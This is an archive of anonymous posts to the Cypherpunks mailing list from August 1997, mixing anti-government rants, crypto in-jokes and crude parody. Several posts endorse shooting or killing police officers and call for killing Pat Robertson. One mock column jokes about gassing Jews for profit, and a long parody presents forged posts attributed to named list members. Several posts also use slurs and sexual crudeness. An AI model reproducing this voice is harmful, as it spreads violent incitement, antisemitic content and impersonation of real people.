   :  Microsoft dinners may be incompatible with other dinners in the
   :  freezer, causing your freezer to self-defrost.  This is a feature,
   :  not a bug.  Your freezer probably should have been defrosted

@_date: 1997-08-22 09:17:20
@_author: Anonymous 
@_subject: heart 
Should we just sit idly by and let police officers attack citizens?
Or maybe we should do what our founders wanted, defend ourselves with
miliary rifles.  So if a pig wants to shove a crowbar up your ass, are you
going to shoot him, or just say "I would never violate your rights like this!"
 "The right of the people to be secure in their persons,   houses,  papers,
and effects, against unreasonable searches   and  seizures, shall not be

@_date: 1997-08-22 12:19:31
@_author: Anonymous 
@_subject: Socio-Economic Cults (Re: CypherPunk Cults) 
It certainly sounds like blackmail to me.
Surely people on this list are aware of how fallible governments are? Those punishments are a bit too final to be within the power of a legal
system so prone to mistakes and corruption. Although current western legal systems constrain citizens, they also
constrain the government, which is probably a good thing.  The media is
very weak on reporting abuses of power by police and the military, but at
least they're not always completely covered up.  Yes, both individuals and governments can break the law, but it stops them
Other common oversimplifications include:
 The United States has a large gap between rich and poor and a lot  of crime.
 The United States has a lot of lawyers and a lot of crime.
 The United States has a lot of guns and a lot of crime.
"Every problem has a simple solution... and it's wrong" -- Mark Twain

@_date: 1997-08-22 13:51:21
@_author: Anonymous 
@_subject: ROTFL / Re: Socio-Economic Cults (Re: CypherPunk Cults) 
"When all you have is spam, everyone looks like Tim C. May."
         - Dimitri Vulis, KOTM

@_date: 1997-08-22 13:57:38
@_author: Anonymous 
@_subject: State Charges in Weaver Case 
No. Give him Jim Bell's lawyer--he can get them to reduce the charges
to "making the mortuary smell bad."

@_date: 1997-08-22 13:59:00
@_author: Anonymous 
@_subject: Welfare Solution #389 / Re: Socio-Economic Cults (Re: CypherPunk Cults) 
Welfare Solution   Many in the welfair class have their basic needs met by the government
and then steal to buy heroin.
  How about this? - When a person on welfare is busted for heroin use,
or theft to support a habit, the State thereafter sends the person's
welfare check to a Crime Restitution fund and lets the person keep
stealing, only now it is for the purpose of supplying their own
basic needs.
  The crime rate stays the same, but the victims receive some amount
of recompensation.
  Damn, I'm smart...

@_date: 1997-08-22 14:02:36
@_author: Anonymous 
@_subject: Socio-Economic Cults (Re: CypherPunk Cults) 
Policeman: "Sir, I'm calling to notify you that a criminal has broken
  into your house."
Citizen: "Damn. I hope he didn't hurt himself. I forgot to pay my   insurance bill this month."
  Tell me about it...

@_date: 1997-08-22 15:36:38
@_author: Anonymous 
@_subject: State Charges in Weaver Case 
The godless Libertarians are also spouting off the same type of ludicrous claims regarding government officials being responsible
for their actions.
  Like the people we vote for actually had any say in how this
country is run... Geez, wise up, guys.
THE LIBERTARIAN, By Vin Suprynowicz
    'Enough money to have fed every human on earth'
    "August 2, 1997, marks the 60-year anniversary of the failed and
devastating American public policy of drug prohibition," announced
California Libertarian  gubernatorial candidate Steve Kubby of Lake
in a recent -- and refreshingly outspoken -- press release.
  "Just how big is $400 billion?" Kubby asks. "Adjusted for 1997
$400 billion is enough money to have fed every human on Earth, each
for the past 10 years."
  "As one of the chief architects of the War on Drugs, Lungren has a lot
explaining to do," Kubby said. "What has been accomplished by spending
such an incredible sum of money? We've created the biggest prison system
the history of the world, with more of our own citizens rotting behind
than any other nation in the world -- and drugs are cheaper and more
available than ever before, especially to kids.
  "It's time to hold public officials like Dan Lungren accountable for
tragic waste of money and lives that has produced nothing but more
more violence, more addiction, and more misery."
"It is even more puzzling as to why Mr. Lungren thinks his colossal
failures in the War on Drugs qualify him for higher public office."
  The "Kubby for governor" web page is at
Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin at lvrj.com. The
site for the Suprynowicz column is at column is syndicated in the United States and Canada via Mountain Media
Syndications, P.O. Box 4422, Las Vegas Nev. 89127.

@_date: 1997-08-22 16:46:45
@_author: Anonymous 
@_subject: Bad CypherPunk! No privacy! / Re: PGP5i supports RSA keys? 
Other than the above, a very informative post.
  Perhaps all encryption programs ought to be named Enigma-1,
Enigma-2, etc.
  When the Allies gained the capability to break the Enigma code,
there was no front-page announcement. I checked the news headlines
today, and there was no front-page announcement of a "radical
algorithmic breakthrough." I take this to be proof positive that
the ever-present "they" have indeed made a breakthrough, and that
I need to use the strongest tools currently available for secure   Like the ZipLock ads where they put the angry bees in the ZipLock
and in the Generic Brand plastic bags, I am always tempted by the
statement that "512/1024/etc." is "good enough," to ask the person
making the statement to write a letter threatening the life of
"You Know Who," encrypt it and send it to me for forwarding to
the Whitewaterhouse. ("And don't forget to use the '-c' option.")
  Would you rather have the angry F-Bee-I agents in the 4096 bit
encrypted CryptLock bag or the 1024 bit GenericLock bag?
:: B o o t s

@_date: 1997-08-23 00:18:24
@_author: Anonymous 
@_subject: No Subject 
of crime.
Elminate it.
Don't see how you can argue against that one.
So?  Actually, we have a lot of handguns, in the hands of criminals,
and even bigger guns in the hand of government terrorist groups like
the ATF, FBI, and the National Park Service.
If we have guns in the hands of responsible people, we have a good
society, armed, secure, and safe, like in Switzerland.
We don't need disarmamant.  We need armed responsible citizens forming
their own militias.  If we had that on a wide scale, we wouldn't need
a professional army.
Guns are neither good nor bad, but what we make of them.  They're
tools, much like plungers, which can be used to unclog a toilet after
visiting a Mexican Restraunt, or to sodomize a suspect.  Use plungers
and guns responsibly, and for good.

@_date: 1997-08-23 01:10:31
@_author: Anonymous 
@_subject: No Subject 
Kent Crispix drunkenly blubbered out:
Like what Kent, asking cops to defend you, from Cops?  Sorry, Kent,
that method doesn't work.  Filing a lawsuit, or bringing them to court
won't stop em from doing it again, also, a chance remains that they
won't get convicted, after all, almost any police force I've seen
always gets off for doing things.
Remember, plungering someone like that is definitely a cruel and
unusual punishment, and therefore a crime in itself.
Those pigs should rot in jail for violating someones constitutional
However, the eye for an eye thing would make for an interesting
punishment for the cops.
"There's something wrong with not killing cops in defense who sodomize

@_date: 1997-08-23 01:47:59
@_author: Anonymous 
@_subject: Plot of the Platypus 
**********        ~~~~~~~~~~~~~~~~~~~~       **********
WARNING!!!        Plot of the Platypus       !!!WARNING
**********        ~~~~~~~~~~~~~~~~~~~~       **********
  Since the death of Dale Thorn, I have lurked silently in the list
background while observing the creeping conspiracies continually
compromising cypherpunk costs.
  I mean..."posts." {Damn, now I'm doing it, too.}
  Doing what, you ask?   How did you know what I said? Are you with the MIND POLICE?   AM I SURROUNDED??!!!??
  {Oh...I see that I put that thought in brackets, where you could
   read it. Whew! Had me worried for a minute, there.}
  To continue...
  Being an anonymous coward who hides behind remailers the few times
that I post, I have been somewhat hesitant, nonetheless, to reveal
the observations and accompanying thoughts about the direction that
the cypherpunks lissed has taken {Damn, that's twice, already. I may
be infected, like many of the others} since the end of the Nazi moderation/censorship experiment.
  While other, more vocal, list members were celebrating the apparent
'victory' over the johnboot of fascism being lifted from our typing
fingers, I had a troubled mind, worrying whether the evil forces
were truly vanquished or whether they had merely escaped by way of
the anonymous remailers, to the negative pole, where they would
bide their time and prepare to strike again.
  I was counting on the shit-disturbers, chiefly Dale Thorn, to
keep a practiced eye out for signs of the evil farces {Was that a
typo, a Freudian slip, or another sign of the mind infection that
is rapidly spreading on the list?} regrouping to once again try
to destroy the cypherpunks list.
  Suddenly, Dale disappeared--faster than you can say, "Jimmy Hoffa."
For a time, Toto attempted to carry on in his stead, but I *knew*
Dale Thorn, and Toto is no John F. Kennedy.
  {Shit! Now I'm beginning to steal and corrupt the words of others.
   I'm not certain I like the implications of this. The plot may go
   even deeper than I previously thought...}
  Where was I...?
  Oh, yes...the Plot of the Platypus...
William H. Geiger III writed:
                            *^^*
Anonymous rote:
                 *^^*
  Then, in a startling development,
...                                        *^^^^^^^*
  Notice anything a little bit *strange* in the above quotes?
  Suddenly, "? the Platypus" is the the only one of this group that
can spell welfair...warfair......welfare.
  {Damn! What's that clinging to my back?}
  What is going on here? As the Platypus's spelling gets better, the
other list members' spelling gets worse.
  For example:
Ray Arachelian sayhed:
         *^*
     *^^*
Tim May wroted:
      *^*
  The Cypherpunk Philosophist King, lame-ing while flame-ing? Worse yet, while flame-ing about lame-ing?
  Lame-ing while flame-ing about lame-ing? Fucking up his spelling while taking a cheap-shot at someone's disability in their ability to
'dis' someone with proper spelling?
  And then, after his "capitcal" misfire, the object of his scorn returns fire with a correct spelling of "redistribution?"
? the Playtpus correctly scripted:
  Am I making too much of this? A few simple typo's, you say? Perhaps
an occasional slip of the finger--a momentary lapse of mind and/or
memory, leading to a misspelled word?
  {Or is it 'mispelled'? I don't know, and I'm afraid to look it up.
   I could use the spell checker, but... No! It's too dangerous.}
  It's the Plot of the Platypus, I tell you...I AM NOT CRAZY!!!!
  I did extensive analysis of the list posts in the last few months,
and I can state with absolute certainty that for every slight
improvement in the quality of the Platypus's spelling, there is a court responding decease in the Kuala-T of many of T ohter libsp
mambors spealing.
  {See? Do you SEE!?!? IT'S EVEN HAPPENING TO *ME* NOW.}
  That's not all. Just like before, others on the list are acting as
the shills for the chief instant gator of this spelling tragivesty.
Bill Stewart, a consciencious speller, said:
  See? Do you SEE?!?
  The subtle slams by the co-conspirators are beginning. It's the
next stage...
  "Having a little trouble with your spelling there, pal? There's no
more censorship, so you can say anything you want...as long as you
can SPELL it! Haaa...haaaa...haaa."
  The ebil fartses are once again attempting to split the cybferpukes
lissed in2 too kamps--the good spellers and the bag speelers.
  Think about it. Have you ever heard of "agraphia" before? Ever known
anyone that had it? Of course not! It was developed in an underground
lavoratory in Area 51 by reptilian Nazis.
  Well, maybe not "reptilian", but Nazis, just the same.
  And LOOK! I'm using double-quotes! *Misplaced* double-quotes,   THE MARKS OF THE *TOTO*!!!
  The conspiracy is spreading fast. It's everywhere. Kent Crispin,
government schill {Damn! I even spell 'shill' like Toto, now. At
least I managed to use single quotes this time, like we did in
the old days, before the censorship crisis...which just 'happened'
to happen shortly after Toto happeared out of nowhere...}
  Where was I...? Oh, yes...
  Crispin, who has long previously been the target of many vicious attacks by both Toto and the Platypus, is now showing signs of
the government generated Platyagraphia and the double-quote marks of the Toto.
Kent Crispin  say-heyed:
                ^    ^^^      ^
  Or is Kent Crispin, gubormint chill, marking funds of the wrist
of U.S.? Is he laughtering at uds B-hynd R backs?
  Is he a bubble agent in the Plop of the Paperplutz?
  Still skeptical? Wait!! There's more!!!
  {No, not the Ginsu knives, you fools. I'm talking about the Plop
   of the Pretty Puss.}
  Think about the following pots, which wah *snot* sent to the list
in order to hide the troops from the simplefucks lips dismemberers.
  Since it was not cent 2 the lips, I had to make it up, and now
I'm a forager, like Tutu making those bag fridgeries of ohter
cheaples pastes when he abuses their names without having their
parsimmons to accuse their name for making his own pissed to the
cyberhunks lost.
------- Begin Pretty Good Pretending-------
PGP: Bad Spelling Virgin 0.1
  Tired of being a LOSER? Tired of failing in your list takeover
bids while others, like the _fuck_you_morons_ spammer, AOL'ers,
and blonde bimbos with huge breasts are getting ahead in life?
  Tired of not getting your secret cypherpunks decoder ring, like
the others, because you don't use an "authorized" operating
system, and you can't spell "welfare" even though you're on it?
  Join the SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST today,
and turn your life around.  {No Bullshit! This conspiracy is so fucking secret that *nobody*
  knows about it--NOT EVEN ME! I had to make it up! That's how
  secret it is.}
  Good gays Finnish lost. Why do they "Finnish lost"? Because they waste their time with correct spelling, proper placement of quotation marks, and trying to develop a consistent list
persona when there are already millions of Internet identities
out there already, just waiting to be abused.
  Face it, its the assholes that usually end up on top, and not
just because most people sleep on their stomaches. So why are
you WASTING YOUR TIME being a good gay, when the assholes are
making the BIG BUCKS by putting naked pictures of big bucks
fucking big butts on their "Native American Nude MLM" web site?
  Tired of being an anarchist? Tired of waiting for Jim Bell
to rat you out as being a co-conspirator in his evil plot
to overthrow the government? Tired of standing in front of your
mirror, trying to practice acting surprised when armed forces
from a dozen government agencies kick down your door to announce
that someone nuked D.C., and they'd like to "ask you a few
  Join the SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST. Do it
TODAY, and you will be guaranteed a secret cypherpunks decoder
ring when the people who pull our strings pass a law criminalizing
them (except for use in meeting the legitimate needs of secret conspirators against the cypherpunks list).
  Listen to what these Secret Conspirators have to say:
Peter Trei:
  "Hi. I used to be a boring guy. I was so boring that none of the assholes on the list even bothered insulting me, or forging posts in
my name.
  "Then one day, my life suddenly changed. Someone forged a post to the list in my name, and it was exciting. It was like getting robbed
at gunpoint. What a rush!
  "When I woke up the next morning, I couldn't face going back to my
normal, moral, ethical, boring life. I sent an anonymous post to the
list--as TruthMonger! It felt good, like being elected to a government
office by lying to people, but I wanted MORE. I began forging posts to
the list using other people's identities. If they complained to the
list, then I killed them, and assumed their list identities. It felt
like driving INSLAW into bankruptsy, stealing their software, and
murdering those who knew too much!
  "Now I am Peter Trei, boring cryptographer, by day, but I am any
exciting, unethical asshole I want to be, at night.
  "I liked the SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST so
much that I *stole* the conspiracy. "? the Platypus" has nothing
to do with the Plot of the Platypus, I'm just making fun of his
disability, like a real asshole. Toto has nothing to do with it,
either. He's such a loser that everyone on the list can spot his
forgeries. (Well, they "used to could". But now that I can mimic
his style and have hacked his sympatico account, I can deny all
of this from my real list persona tomorrow, and nobody will be
the wiser.)
  "I'm not just a user of the cypherpunks list, I'm an abuser."
Kent Crispin:
  "This isn't Peter's conspiracy, its MINE! I mean, get real, I
work in a secret underground lavoratory as a government shill.
  "Think about it. Who would you expect to conspire against a
bunch of anarchists...the government! You all know how much I
love the government and authority. I'm Louis Freeh's secret
lover. Janet Reno is going to have my baby.
  "It's me! *I* am the one behind the SECRET CONSPIRACY AGAINST
THE CYPHERPUNKS LIST. I'm a STATIST, for God's sake, why won't
you believe me?   "Because I'm not one of the elitist 'chosen?' Fuck you."
Tim May:
  "God, I *love* this list."
Robert Hettinga:
  "Hey! If you check the archives, you'll find that I said that in a post, long before anyone else did."
  "Now Hettinga is stealing Tim May's lines. What the hell is going on, here? Has *everybody* on this list gone crazy?
  "*I* am the one who is *really* behind the SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST. Think about it. Everyone knows
that I'm a 33rd degree Mason.  No...that's Tim May.
  "Fuck this shit. From now on, I'm posting as Toto."
John Perry:
  "This has gone on long enough. I'm killing this thread.
...I mean..."post." ...I mean...
  "Shit! I'm not the list moderator, yet. That's *after* we
take over the list."
  "Sorry."
------- End Pretty Good Pretending-------
~~~~~~~ Begin Note From Igor ~~~~~~~
Do you all remember the Perl script I was working on for mimicking the
posts of other people? Well, this post is the latest product of that
script. What do you think? Is it convincing? Did you really believe
that it was actually written by one or more of the people mentioned
in the post?
I think that I finally have the Perl script to the point where I can
effectively fool most people about the true source and method of a
computer generated post's actual origins.
  I was thinking about adding a conspiratoral part about myself. I was
going to intimate that the fact that I was so active on the list during
the censorship crisis, playing the skeptic who was gradually brought
around to the truth of Dale Thorn and Toto's claims, then volunteering
to host the list and quietly disappearing into the background, might
indicate that *I* was really behind the SECRET CONSPIRACY AGAINST THE
CYPHERPUNKS LIST.
  In the end, I decided against it, because then the readers would be
left with the notion that perhaps even this explainatory note from me
was bogus, and that there really was an ongoing SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST.
~~~~~~~ End Note From Igor ~~~~~~~
                            **********
                            DISCLAIMER
                            **********
    THERE IS *NO* SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
lai;ekrjke ^C
    THERE IS *NO* SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
dakl;jdafkl;jad;jfa  ^C ^C
                                                           *^^^*
ldfafd;ljfd;  ^C^X^C
    THERE IS *NO* SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
da;lkdf ^C
    THERE IS *NO* welfair ad;fljadf;
                     *^^^*
ad;sljf;afj ^C ^C ^C
    THERE IS *NO*

@_date: 1997-08-23 05:38:21
@_author: Anonymous 
@_subject: No Subject 
Did Patrick Oonk send this one?
If someone nuked D.C., most of those bastards would probably be dead.
Then again... they propably have em stuffed in capsules, to be opened
when communication is lost with Washington D.C.  Millions of theses
bastards!!!!  All located on the surface of Uranus.  Upon losing the
signal with D.C., they'll fly to Earth, to once again enslave the
free.  What's the solution???!!!???  We must send all our nuclear
arsenals to the surface of Uranus, and set them off, ONLY THEN WILL WE
BE SAFE!!!
Heheh, well, at least they got Kent summed up in 3 paragraphs.
"Like them new Stealth Helicopters, equipped with devices to drown out
the sound."
"Dale, where the hell did you hear that!?"
Except for Kent Crispin.
Yeah, no one's safe when those god-damn goat herding sniper kids,
lucky those good soldiers hit him fast!
There is, however, a secret-conspiracy by Paul Pomes to shut down
"Ahhh, look, another mutilated cow."
"Musta been them aliens."
"Nah, it's them damn black helicopters.  Killin' all my friggin

@_date: 1997-08-23 09:07:14
@_author: Anonymous 
@_subject: No Subject 
FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED AUG. 31, 1997
    THE LIBERTARIAN, By Vin Suprynowicz
    'Necessary to the security of a free State'
 "I agree that things like the court system
can be
privately funded. ... However, my greatest concern is that a military
has to run a "pledge drive" in order to provision itself would not be
capable of posing a credible deterrent to any nations bent on
the US. If  you could address this point, I would appreciate it.
    #  #  #
  O.K. ...
  First, the notion that it's all right to steal at gunpoint "some
amount, as long it serves a legitimate public need" ignores the simple
moral truth that the end cannot be allowed to thus justify the means.
  When I loot your paycheck without your permission to do "good
works," I
can't possibly know whether that leaves you one dollar short of the
you needed to buy medicine for your dying mother, or one dollar short
the money you needed to complete an experiment that might result in
discovery of a cure for cancer.
  There is literally no way to measure the opportunities I thus steal
you, and how their potential results might weigh against what (start
ital)I(end ital) decide to do with your money. (Even assuming power
corrupt me until I can blithely assure you that "tobacco subsidies"
are "in
the public interest.")
  But on to J.P.'s main point: the need to fund a standing, federal
  The only thing that grants the United States government any
legitimacy --
that supposedly differentiates it from some gang of bandits that
down from the hills and extracts tribute for as long as the coast
clear -- is the Constitution.
  The Constitution would have not have been ratified by enough states
take effect without solemn binding promises that a Bill of Rights
quickly be enacted. Without the Bill of Rights, the Constitution is
and of no force.
  The Bill of Rights prominently features the Second Amendment, which
instructs us: "A well regulated Militia, being necessary to the
security of
a free State, the right of the people to keep and bear Arms, shall not
  This is a founding principle of our nation. Should the national
government eviscerate or foreswear that principle, it is not only our
right, but our duty, in Jefferson's words, to "alter or abolish it,
and to
institute new Government."
  The founding document does not find ANY role for a standing,
army in  preserving "the security of a free state." As a matter of
the founders traveled the land, preaching the EVILS of a professional,
standing army. And they were right.
  Our domestic, professional, standing army today consists of
legions, somewhat on the Roman model but also on the model of the
personalized Waffen SS Divisions created as adjuncts to Hitler's
with personal loyalty oaths sworn to the Fuhrer, and customized
adopted with silver dagger or death's-head totems, etc.
  Currently going through precisely the kind of expansion and rearming
transformed Hitler's personal bodyguard from the scruffy SA
brownshirts of
1934, to the well-armed, professional SS divisions of 1940, our own
paramilitary legions are today dubbed "ATF, "FBI," "FBI Hostage
"DEA," etc.
  Some of these units now number in the THOUSANDS, and are authorized
deploy COMBAT AIRCRAFT. They routinely train with precisely the kinds
explosives and automatic weapons you or I could go to prison for
possessing, and practice rapid helicopter deployment and "dynamic
into URBAN AREAS. These guys are not just getting ready to investigate
next Lindbergh kidnapping.
  Can such outfits exist in parallel with a strong citizen militia?
WILL not, and they are currently demonstrating this to us in spades,
infiltrating with agents provocateurs every legitimate citizen militia
they can find, framing the leaders on amorphous "conspiracy" charges,
sending them away for decades.
  As they say in the popular sword and costume series, "There can be
only one."
  But what is equally important, is to realize that a citizen militia
ADEQUATE to defend the security of a free state, even against the
most powerful, most technologically advanced power in the world.
  George Washington proved this in 1781. And for anyone who harbored
illusion that "conditions have so changed in 200 years" that this was
longer the case, the Vietnamese and then the Afghans successively
proved it
again, in our own lifetimes.
  Next time: Do we need a standing army, at all?
Vin Suprynowicz is the assistant editorial page editor of the Las
Review-Journal. Readers may contact him via e-mail at vin at lvrj.com.
The web
site for the Suprynowicz column is at column is syndicated in the United States and Canada via Mountain
Syndications, P.O. Box 4422, Las Vegas Nev. 89127.
Vin Suprynowicz,   vin at lvrj.com
"A well-regulated population being necessary to the security of a
state, the right of the Government to keep and destroy arms shall
not be infringed."

@_date: 1997-08-23 11:34:24
@_author: Anonymous 
@_subject: When did he get traded to the Black Hawks? 
I'm a Frisbeetarian. I believe that, when you die, your soul goes up
on the roof, and you can't get it down.
  Nonethemore, I take umbrage at much of the recent Christian-bashing
taking place on the cypherpunks list. Bash Pat Robertson, 'make fun' of Jesus, but please, stop painting with the wide brush. If I claim to speak for the cypherpunks, then I would expect to be roundly booed
and set upon by Mongers with long teeth and shot at by whoever May
choose to do so. I expect the same for Pat Robertson when he speaks
for Jesus. He's an asshole!
  However, the cypherpunks mailing list serves a purpose for giving
us a forum to discuss and debate issues that are important to us, and
the Christian faith does likewise for those who think evolution is
a Satanist plot, and Jesus plays goalie for the Chicago Blackhawks.
(Jesus Saves! {But Gretsky puts in the rebounds.})
  Uuuhhh...forget what I just said. Let's kill this fucker and
anyone who tunes him in on "the day of the sun."
  This sounds like a misrepresentation of Robertson's beliefs,
by someone who has an axe to grind, but now that I've got the
adrenaline flowing, I don't give a shit. Let's kill him!
  That costs extra... At least, in the places I frequent, it does.
  If God is Love, and Love is Blind, then Ray Charles must be God.
  Why do people say things like this, without giving pointers
to the relevant URL's? If I'm going to avoid sinful web sites,
then I need to check them out first, so that I know what I am
avoiding.   Being the forgiving type, I would also feel obligated to keep
checking these evil web sites out on a regular basis, to see if
they have repented, yet.
  God (pardon the expression), but you have a negative attitude. There
are many valuable things one can learn from studying the Bible.
  e.g.
Q?: Who was the smallest person in the Bible?
A!: The guard who fell asleep on his watch!
Q?: Which stretches further, rubber or skin?
A!: Skin. The Bible tells of a man who tied his ass to a tree, and
    walked over a mountain.
  So, if your brother has a boyfriend...
  I've been wondering what that word was. "Bullshit..."
  I like that word. Does that make me a Christian?
  Hey! I just typed 'God.'
  'God.' Look! I did it again.
  Watch this... Bullshit!
  I'm starting to like this Christian religion thing.
  That's because you don't take the time to understand them.
  Remember, "Patience comes to those who wait."
  Well, I've never actually *met* Bill Gates, but...
  Well, you have to consider the Support package before you really
pass judgement. What kind of Jock strap are we talking about, here?
  Come on, you're overreacting. Everything is disposable these days.   "Everybody must get stoned." - Bob Dylan
  How differently does one have to believe to just get "spanked?"
(I'm not into hard-core.)
  Jesus! (pardon the expression)
  Do these people put out a magazine? Color glossies? Is there
bondage involved? If so, I would be willing to convert.
 > If Christians try to stone anyone, they should be shot right away.
  Not if they pick out the seeds and stems, first.
  I bought a futures contract on "Nine Inch Nails." If they are not
"Eleven Inch Nails" by this time next week, I lose my ass.
  I know this post doesn't make much sense, but it's Friday night and
I haven't got a date. Is anybody out there getting laid tonight? Could
you send me pictures?
  I'm desperate. The posts to alt.boring have slowed to a crawl. I'm
running out of Pop Tarts. Still no word from the Reader's Digest   And the way this relates to cryptography is...
  ...uuuhhh...John Gilmore is a cocksucker!
(Bet you thought this whole damn post was going to be off-topic,
 didn't you?)

@_date: 1997-08-23 11:39:23
@_author: Anonymous 
@_subject: None 
>>  Great Barrington, MA -- In a recent
 >>  pronouncement, television evangelist and
 >>  head of the Christian Coalition, Pat
 >>  Robertson, advocated death by stoning for
 >>  crypto enthusiasts.
 AN> This post has moved me considerably.  Some parts of his speech
 AN> requires a response that words could not adequately describe.
Jim Bell has a solution for that

@_date: 1997-08-24 02:09:26
@_author: Anonymous 
@_subject: Shooting the taggers 
Grand Wazoo MixMaster wrote the lie:
  No. Stun guns are increasingly illegal because some guy once
used one to rob a 7-11 or something, for $15.00.
  Since stopping rape is worth less than $15.00 to those who make
the laws, they have decided that a few thousand rapes is a small
price to pay to protect minuscule corporate interests.
-THE 1/2LIE

@_date: 1997-08-24 03:49:56
@_author: Anonymous 
@_subject: Hlep 
I am trying to find a place to do a cypherpunks list archive search
by Subject: header. (unsuccessfully)
Does anyone have any pointers they can spare?
(No. My problem is not that I can't spel "Help.")

@_date: 1997-08-24 06:38:38
@_author: Anonymous 
@_subject: Save the Children! 
FROM MOUNTAIN HIGH MEDIA
    THIS WASN'T *RELEASED*, IT *ESCAPED*
    THE HITLERTARIAN, By Adolph Suprynowicz
According to my calculations, if we put all of the Jews in concentration
camps, pull out their gold fillings, gas and bury them, there will be
enough money left over to feed all of the starving children in the
I am counting on your support in launching this enterprise. You *are*
in favor of Saving the Children, aren't you?
Next Week:
  Using Drug Profits to Save the Whales!

@_date: 1997-08-24 08:32:03
@_author: Anonymous 
@_subject: In Defense of Pat Robertson and the "700 Club" 
My Bible not only has references to the Vulcans and Klingons, but it
is also signed with Jesus's PGP key, which is verified with Kent
PGP signature (dated Dec. 17, 2041).
  Pigs Fly

@_date: 1997-08-24 12:29:11
@_author: Anonymous 
@_subject: No Subject 
Only for the moment we are saying nothing.
- A'Tak A'Tdorn

@_date: 1997-08-25 10:21:00
@_author: Anonymous 
@_subject: Glut of Doctors? (Oh Horror, Oh Horror!) / Re: index.html 
Thus protecting the citizens from the horrible spectre of reasonably
priced health care. Sick people around the nation must be applauding this government effort.
  I don't suppose that simply "dropping" the subsidy would have the
same result of reducing the number of doctors, would it?
  (Hello! Is anybody home...?)
  At the same time that the baby boom is turning into a geriatric boom
which will increase the need for physicians.
  Sounds like the makings a future "HEALTH CARE CRISIS!!!!" which the
government will have to address with new laws and a dramatic increase
in government funding for subsidized residency training.
  Thank God that the government has had the foresight to increasingly
arm a variety of government agencies so that they can step in to halt
the old, sick sheeple from rushing the medical centers.
  Oh, you mean like is regularly done in the "real" world? Is it "legal"
to do that without government assistance?
  Oh Horror, Oh Horror!
  Reasonably priced health care, and physicians forced to endure the
indignity of providing medical services to people in areas free of
big-city smog.
  Better to heavily arm the big-city government agents to thwart the
threat of all of those country bumpkins getting past the road-block
identity checks and attempting to access the dwindling number of
big-city physicians.
  Jim, did you make this post up? Are you a forger/spoofer? This post
is so typical of government insanity that it seems like a National
Lampoon parody.

@_date: 1997-08-25 12:40:45
@_author: Anonymous 
@_subject: Are we 'Safe' yet? 
Why does it always seem that when my supply of Prozac is dangerously
low, the people on the cypherpunks list who pay attention to what is
happening in the outside world decide to deluge the list with a variety
of posts reminding me how many reasons I have to be depressed about the
creeping tyranny and corresponding usurpment of human rights that is
threatening my right to the pursuit of drug-induced happiness?
  Even more depressing is the realization that I am a cloistered type
of individual who has little contact with the outside world, and that
this probably indicates that I am only seeing the tip of the iceberg
in terms of the atrocities being commited in the name of government.
  Aren't we safe, yet?
  With the thousands of laws that have been generated for our protection
over the last few years, shouldn't we be *more* safe now, rather than
*less* safe?
  Since our safety seems to depend on the erosion of our Constitutional
rights, could the problem be that our rights aren't being eroded *fast*
enough? Should we be pressing the government for immediate suspension
of *all* of our Constitutional rights, so that we can achieve total
safety *immediately*?
  Or should I go hide out at my family's cabin at Ruby Ridge until the
government has finally made the rest of the world safe for me?
A CypherPunk Enquirer subscriber
Oppressed Minds Want To Know

@_date: 1997-08-25 16:00:24
@_author: Name Withheld by Request 
@_subject: unruly cult members 
Would cult members kindly stop bickering and straying from the party
All this argument questioning sacred dogma is anti-cypherpunk, and
clearly bought on by failure to recite the daily mantra:
 "Krispin-hare-hare-krispin government is evil
  Krispin-hare-hare-krispin nuke washington DC
  Krispin-hare-hare-krispin gun down graffiti kids
  Krispin-hare-hare-krispin sterelize the proles"
You're becoming so unpredictable, this is sacrilege, cult members
are supposed to unquestioningly follow sacred dogma.

@_date: 1997-08-25 17:20:53
@_author: Anonymous 
@_subject: $1 Million Code Crack 
Onn Fri, 22 Aug 1997, John Young apparently forwarded from: "$treet
Journal, August 22, 1997, p. A7A.":
ROTFL.  (Well, not literally, but smiling.)  The "How it works" link on
their site is broken :-), so what they're basically saying is "here is
some encrypted text, I bet you can't crack it."
----- UP
dGiGcv1lVheiwX3fpxxy3rMIMpEV-q3s9OF----- End -----
Saying that one-time pads are secure is meaningless.  Their web site
doesn't even mention key exchange.
As the Preface to Advanced Cryptography ( says,
% If I take a letter, lock it in a safe, hide the safe somewhere in
% New York, and then tell you to read the letter, that's not
% security. That's obscurity. On the other hand, if I take a letter
% and lock it in a safe, and then give you the safe along with the
% design specifications of the safe and a hundred identical safes with
% their combinations so that you and the world's best safecrackers can
% study the locking mechanism--and you still can't open the safe and
% read the letter, that's security.
I'm sure everybody here already knew this, but anybody with a million
bucks and no clues at all deserves to be kicked.
I must disagree... they could be a liar _and_ stupid.
Somebody ought to forward this thread to his creditors...

@_date: 1997-08-25 20:06:20
@_author: Anonymous 
@_subject: And they're all CypherPunks... 
Q. You said cows hate spinach, barn owls snore, and
spiders can't chew. But have you forgotten female goats
have beards?
 A. Quite so. Do remember, though, elephants get flat
feet, moths hear through their hair, and starfish have no
brains. I also vividly recall that yaks give pink milk.
LMBoyd Web Site / U. S. Newspapers / Start Email / Stop Email

@_date: 1997-08-25 21:41:01
@_author: Anonymous 
@_subject: Church of Cryptology 
The Church of Cryptology, established by Brother D'Shauneaux in 1919,
resents the attempts of the U.S. government to criminalize our most
closely held religious beliefs.
Cryptography is well documented in the Bible, from the Tower of Babel
to talking in tongues, and any infringement on our right to communicate
in tongues constitutes religious oppression.
Accordingly, the Church of Cryptology would like to acknowledge those
who have suffered persecution in their efforts to spead cryptology as
Saints for the Holy Cause. The Primary Religious Elected Zeus, our
current leader, would like to assure all Cypherpunks that they will
be granted special dispensation for any acts of Holy War they perform
in the cause of strong encryption.

@_date: 1997-08-28 13:35:09
@_author: Anonymous 
@_subject: Snuffle '97 Released / Re: Reuter on Bernstein Ruling 
I just uploaded "Snuffle '97" to replay.com. The new version includes
source code for PGP 5.0, a JPEG of Hillary Clinton in the nude, and the
predicted date of death for the lawyer who files the government appeal
in the Bernstein case.
  Saddam Hussein liked "Snuffle '97" so much, he bought the company!

@_date: 1997-08-28 23:32:29
